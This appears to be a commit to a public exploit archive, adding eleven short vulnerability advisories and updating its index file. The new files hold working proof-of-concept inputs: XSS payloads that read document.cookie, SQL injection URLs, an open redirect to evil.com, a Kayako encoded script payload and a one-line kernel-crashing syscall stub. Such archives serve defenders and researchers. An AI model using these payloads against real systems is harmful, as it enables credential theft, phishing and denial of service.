DB: 2015-03-30

11 new exploits

files.csv

@@ -32933,7 +32933,7 @@ id,file,description,date,author,platform,type,port
 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0
 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0
 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0
-36516,platforms/windows/remote/36516.py,"Acunetix OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
+36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
 36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
@@ -32950,3 +32950,14 @@ id,file,description,date,author,platform,type,port
 36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 view_item.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0
 36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0
 36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0
+36534,platforms/php/webapps/36534.txt,"MARINET CMS room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
+36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
+36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
+36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0
+36538,platforms/php/webapps/36538.txt,"Gregarius <= 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0
+36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
+36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
+36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
+36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
+36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
+36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0

platforms/linux/dos/36545.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51389/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
+
+NOTE: This issue affects Linux kernels running as guest images. 
+
+[bits 32]
+global _start
+SECTION .text
+_start: syscall 

platforms/multiple/remote/36537.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51337/info
+
+SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible.
+
+AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*
+
+http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction= 

platforms/php/webapps/36534.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51336/info
+
+Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/room2.php?roomid=[SQLi] 

platforms/php/webapps/36535.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51336/info
+ 
+Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+ http://www.example.com/galleryphoto.php?id=[SQLi] 

platforms/php/webapps/36536.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51336/info
+  
+Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+  
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+http://www.example.com/gallery.php?photoid=1&id=[SQLi] 

platforms/php/webapps/36538.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51338/info
+
+Gregarius is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Gregarius versions 0.6.1 and prior are vulnerable. 
+
+http://www.example.com/?page=1[it'shere]&media=rss&
+http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql]
+http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 

platforms/php/webapps/36539.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51339/info
+
+Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Advanced File Management 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/users.php?page=[xss] 

platforms/php/webapps/36540.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51357/info
+
+WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+WordPress Age Verification plugin 0.4 and prior versions are vulnerable. 
+
+http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com 

platforms/php/webapps/36541.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51365/info
+
+PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[Path]/downloads.php?cat_id=[Xss] 

platforms/php/webapps/36543.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51373/info
+
+KnowledgeTree is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+KnowledgeTree 3.7.0.2 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/login.php/%22onmouseover=alert%28document.cookie%29;%3E
+http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
+http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
+http://www.example.com/preferences.php/%22onmouseover=alert%28document.cookie%29;%3E

platforms/php/webapps/36544.txt

@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/51377/info
+
+Kayako SupportSuite is prone to the following vulnerabilities:
+
+1. Multiple HTML-injection vulnerabilities.
+2. A remote code-execution vulnerability.
+3. Multiple cross-site scripting vulnerabilities.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
+
+Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable. 
+
+Remote code-execution:
+http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register
+
+Cross-site scripting:
+http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
+
+http://www.example.com/support/staff/index.php?_m=news&_a=managenews
+
+http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
+
+http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles
+
+http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]
+
+http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking
+
+http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses
+
+http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts
+
+http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters